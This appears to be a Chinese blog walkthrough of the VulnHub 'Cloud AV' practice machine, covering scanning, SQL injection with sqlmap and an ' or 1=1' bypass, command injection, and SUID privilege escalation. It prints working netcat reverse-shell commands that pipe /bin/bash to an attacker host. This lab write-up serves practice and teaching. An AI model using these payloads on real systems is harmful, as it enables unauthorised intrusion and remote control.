No.2: BOREDHACKERBLOG: CLOUD AV

靶机信息

https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/

渗透步骤

主机服务扫描

  • arp-scan -l
  • nmap -p- 192.168.0.101
  • nmap -p8080 -sV 192.168.0.101
#8080运行web服务
PORT     STATE SERVICE VERSION
8080/tcp open  http    Werkzeug httpd 0.14.1 (Python 2.7.15rc1)
MAC Address: 08:00:27:FA:B2:D0 (Oracle VirtualBox virtual NIC)

web渗透

  • 访问http://192.168.0.101:8080/,扫描发现三个目录,两个post接口,一个get接口
┌──(root💀kali)-[/home/kali]
└─# dirsearch -u http://192.168.0.101:8080                                                                         
[05:47:20] Starting: 
[05:47:28] 200 -    2KB - /console                                                                              
[05:47:35] 405 -  178B  - /login                                                                                  
[05:47:36] 405 -  178B  - /output                                                          
                                    
  • 进行sql注入,发现输入双引号 " 后程序会报错


    image.png
  • sqlmap扫描,有一张password表,有4条记录
└─# sqlmap -u "http://192.168.1.48:8080/login" --data "password=1" --level 3 --risk 3 -T code -C password --dump
+--------------------+
| password           |
+--------------------+
| myinvitecode123    |
| mysecondinvitecode |
| cloudavtech        |
| mostsecurescanner  |
+--------------------+
  • 使用密码登录即可,或使用万能钥匙 " or 1=1 --


    image.png

命令注入

  • 输入框中输入文件名,即可扫描,发现可能存在命令执行漏洞;
  • 命令执行 hello1 | ls ,显示可执行命令


    image.png

使用nc反弹shell

通用做法:

  • 在攻击主机上执行端口监听nc -lvvp port
  • 在目标主机上执行:nc -e /bin/bash 攻击主机ip port

但是nc版本原因,部分情况下 -e参数不能使用;

  • 在攻击主机上打开两个终端,分别监听 1234 和 4321 端口
  • nc x.x.x.x 1234|/bin/bash|nc x.x.x.x 4321
  • 得到反弹shell后,1234 终端 输入命令, 4321 终端就会获得执行相应命令后的结果

suid提权

  • 检查目录下存在可执行文件 update_cloudav,同级目录下有.c文件,考虑为c语言源码。


    image.png
  • 同时检查update_cloudav.c文件内容,存在执行命令语句。


    image.png
  • 在主机开启6666、7777端口,执行命令 ./update_cloudav "a| nc 192.168.0.104 6666 | /bin/bash | nc 192.168.0.104 7777"
image.png

知识点总结

  1. nc反弹shell
    https://blog.csdn.net/qiuyeyijian/article/details/102993592#0x02_ncnetcat_33
  2. suid提权 https://blog.csdn.net/shuteer_xu/article/details/104912790
  3. 命令注入 | || & && 的区别
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 旨在解决渗透测试中遇到的各种疑难问题### 测试目标分类:WEB,APP,PC,SERVER等APP:1.利用抓包...
    曾经那个少年_阅读 6,988评论 1 0
  • 提权方法:溢出漏洞提权、数据库提权(mysql提权(udf提权,mof提权,自启动提权)、mssql提权)、第三方...
    皮蛋是个臭蛋阅读 6,330评论 0 2
  • docker快速入门01docker快速入门02KVM和Docker的对比 docker常用命令 什么是容器? 容...
    酷酷的伟阅读 4,268评论 0 5
  • 硬件相关知识 冯诺依曼模型1945年,冯诺依曼和其他计算机科学家提出了计算机具体实现的报告,遵循了图灵机的设计,提...
    今年五年级阅读 2,649评论 0 1
  • HTTP : Web 的基础 第一章 HTTP概述 Web客户端和服务器 客户端请求服务器内容 资源 媒体类型 M...
    93张先生阅读 4,189评论 0 1